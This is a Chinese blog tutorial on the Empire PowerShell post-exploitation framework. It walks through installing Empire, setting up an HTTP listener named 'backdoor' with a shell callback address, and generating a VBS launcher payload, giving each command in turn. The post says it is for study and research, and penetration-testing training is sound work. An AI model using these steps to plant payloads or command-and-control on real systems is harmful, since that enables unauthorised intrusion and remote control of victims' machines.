记Empire工具后渗透的使用

/ 工具分享 / 0 条评论 / 4361 浏览

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!!

介绍

我随便摘抄了一段过来. 一说内网,我们基本都是在第一时间想到Metasploit,因为有Metasploit这么强大的存在我们很少能注意到别的工具。Metasploit的牛逼之处在于他不管是信息收集,渗透,后渗透,木马,社工,你能想到的他基本都可以做到,杀人越货必备啊。但是Empire就是针对内网渗透,针对Powershell,我们在内网渗透中肯能用到的powershell脚本,全部都在Empire的框架中了,更是域渗透神器!但是关于Empire的资料,国内真的是少的可怜,就那么几篇。做安全,不得不佩服国外的大牛们!

项目地址

https://github.com/EmpireProject/Empire

安装

进入setup目录执行install.sh文件即可开始安装

./install.sh

设置监听

ps:这里记录一些简单记录使用,用过msf都可以很快上手,set的时候注意大写
Empire的listeners就是MSF的监听。就是创建一个监听载荷。Agents相当于MSF的会话sessions。
启动empire

./empire

启动后如下
empire

输入命令进入监听

listeners

选择监听方法

uselistener http

设置监听名

set Name backdoor

设置shell回弹地址

set Host http://192.168.0.21:4444

设置相应的端口

set Port 4444

开始监听

execute

生成payload

输入main命令回到主菜单

main

输入usestager后两下tab查看可以生成的payload

usestager

生成vbs的payload

usestager windows/launcher_vbs

设置监听

set Listener backdoor

生成payload(默认tmp目录下)

execute

参考

后渗透测试神器Empire的详解
内网工具学习之Empire后渗透

本文最后编辑时间为: 2019-09-18

如本文对你有帮助,点击广告支持一下吧,创造不易。

safe6